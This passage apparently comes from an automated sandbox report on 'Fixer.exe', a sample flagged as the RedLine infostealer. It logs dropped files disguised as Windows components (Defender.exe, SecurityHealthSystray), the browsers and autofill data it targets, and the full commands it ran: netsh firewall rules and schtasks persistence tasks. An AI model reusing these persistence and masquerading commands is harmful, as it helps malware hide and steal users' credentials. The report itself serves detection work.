                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3AE28E19_2_00007FFA1B3AE28E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B0A4719_2_00007FFA1B3B0A47
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3AD07819_2_00007FFA1B3AD078
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B267919_2_00007FFA1B3B2679
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3AEB0419_2_00007FFA1B3AEB04
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B351D19_2_00007FFA1B3B351D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3ADD2019_2_00007FFA1B3ADD20
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3A7F3019_2_00007FFA1B3A7F30
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3A518019_2_00007FFA1B3A5180
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B1DD719_2_00007FFA1B3B1DD7
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B3E9E19_2_00007FFA1B3B3E9E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B410F19_2_00007FFA1B3B410F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3ADCE919_2_00007FFA1B3ADCE9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B275F19_2_00007FFA1B3B275F
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3CC7E620_2_00007FFA1B3CC7E6
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3C82DB20_2_00007FFA1B3C82DB
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3CD59220_2_00007FFA1B3CD592
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3CED4920_2_00007FFA1B3CED49
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3C605820_2_00007FFA1B3C6058
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3D0F8D20_2_00007FFA1B3D0F8D
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3C522820_2_00007FFA1B3C5228
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3C8E3020_2_00007FFA1B3C8E30
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3C55DA20_2_00007FFA1B3C55DA
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3CF98020_2_00007FFA1B3CF980
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AC83221_2_00007FFA1B3AC832
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B1C8C21_2_00007FFA1B3B1C8C
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AD07821_2_00007FFA1B3AD078
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AEB0421_2_00007FFA1B3AEB04
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3A7F3021_2_00007FFA1B3A7F30
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3A622021_2_00007FFA1B3A6220
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3ABA8621_2_00007FFA1B3ABA86
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AE28E21_2_00007FFA1B3AE28E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B0A4721_2_00007FFA1B3B0A47
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B267921_2_00007FFA1B3B2679
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B351D21_2_00007FFA1B3B351D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3ADD2021_2_00007FFA1B3ADD20
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B353121_2_00007FFA1B3B3531
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3A518021_2_00007FFA1B3A5180
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B275F21_2_00007FFA1B3B275F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B1DD721_2_00007FFA1B3B1DD7
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B3E9E21_2_00007FFA1B3B3E9E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B410F21_2_00007FFA1B3B410F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3ADCE921_2_00007FFA1B3ADCE9
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39C7E622_2_00007FFA1B39C7E6
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39833A22_2_00007FFA1B39833A
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39D59222_2_00007FFA1B39D592
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39ED4922_2_00007FFA1B39ED49
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39605822_2_00007FFA1B396058
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3A0F8D22_2_00007FFA1B3A0F8D
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3A234222_2_00007FFA1B3A2342
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39522822_2_00007FFA1B395228
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B398DE922_2_00007FFA1B398DE9
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3955DA22_2_00007FFA1B3955DA
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39F98022_2_00007FFA1B39F980
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DC83223_2_00007FFA1B3DC832
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E1C8C23_2_00007FFA1B3E1C8C
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E0C4D23_2_00007FFA1B3E0C4D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DD07823_2_00007FFA1B3DD078
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DEB0423_2_00007FFA1B3DEB04
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D7F3023_2_00007FFA1B3D7F30
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E420D23_2_00007FFA1B3E420D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DBA8623_2_00007FFA1B3DBA86
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DE28E23_2_00007FFA1B3DE28E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E267923_2_00007FFA1B3E2679
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DDD2023_2_00007FFA1B3DDD20
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E351D23_2_00007FFA1B3E351D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D518023_2_00007FFA1B3D5180
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E102E23_2_00007FFA1B3E102E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D03C823_2_00007FFA1B3D03C8
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D03D823_2_00007FFA1B3D03D8
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E275F23_2_00007FFA1B3E275F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D622023_2_00007FFA1B3D6220
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E1DD723_2_00007FFA1B3E1DD7
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E3E9E23_2_00007FFA1B3E3E9E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E0A3D23_2_00007FFA1B3E0A3D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E410F23_2_00007FFA1B3E410F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DDCE923_2_00007FFA1B3DDCE9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D0D6D23_2_00007FFA1B3D0D6D
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AC7E624_2_00007FFA1B3AC7E6
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A833A24_2_00007FFA1B3A833A
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AD59224_2_00007FFA1B3AD592
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B254824_2_00007FFA1B3B2548
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AED4924_2_00007FFA1B3AED49
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A605824_2_00007FFA1B3A6058
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B2B0224_2_00007FFA1B3B2B02
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B0F8D24_2_00007FFA1B3B0F8D
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A8B5624_2_00007FFA1B3A8B56
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B260A24_2_00007FFA1B3B260A
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A522824_2_00007FFA1B3A5228
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A55DA24_2_00007FFA1B3A55DA
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B264624_2_00007FFA1B3B2646
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AF98024_2_00007FFA1B3AF980
                      Source: Fixer.exe, 00000000.00000002.52599130900.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSecurityHealthSystrayj% vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameexplorerr) vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000000.52343916297.00000000006B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs Fixer.exe
                      Source: Fixer.exeBinary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                      Source: Fixer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Fixer.exe, type: SAMPLEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.GetAccessControl
                      Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.SetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, sMngcJoYCfD.csSecurity API names: File.GetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, sMngcJoYCfD.csSecurity API names: File.SetAccessControl
                      Source: Defender.exe.3.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.GetAccessControl
                      Source: Defender.exe.3.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.SetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csSecurity API names: File.GetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csSecurity API names: File.SetAccessControl
                      Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.GetAccessControl
                      Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.SetAccessControl
                      Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, RBUgQcjHqRKyAa.csSecurity API names: File.GetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, RBUgQcjHqRKyAa.csSecurity API names: File.SetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, RBUgQcjHqRKyAa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: Defender.exe.3.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.GetAccessControl
                      Source: Defender.exe.3.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.SetAccessControl
                      Source: Defender.exe.3.dr, lXExsaLrgYgEOOXK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: Defender.exe.3.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Defender.exe.3.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: File.GetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: File.SetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@36/7@1/2
                      Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\SystemCacheJump to behavior
                      Source: C:\Windows\System32\Defender.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
                      Source: C:\Windows\System32\Defender.exeMutant created: \Sessions\1\BaseNamedObjects\kkepmy41u(qg%$l6
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                      Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeJump to behavior
                      Source: Fixer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Fixer.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Fixer.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                      Source: Fixer.exeReversingLabs: Detection: 68%
                      Source: Fixer.exeVirustotal: Detection: 79%
                      Source: unknownProcess created: C:\Users\user\Desktop\Fixer.exe "C:\Users\user\Desktop\Fixer.exe"
                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe "C:\Windows\System32\xdwdSecurityHealthSystrays.exe"
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                      Source: unknownProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\Defender.exe "C:\Windows\System32\Defender.exe"
                      Source: unknownProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: unknownProcess created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                      Source: unknownProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: unknownProcess created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" Jump to behavior
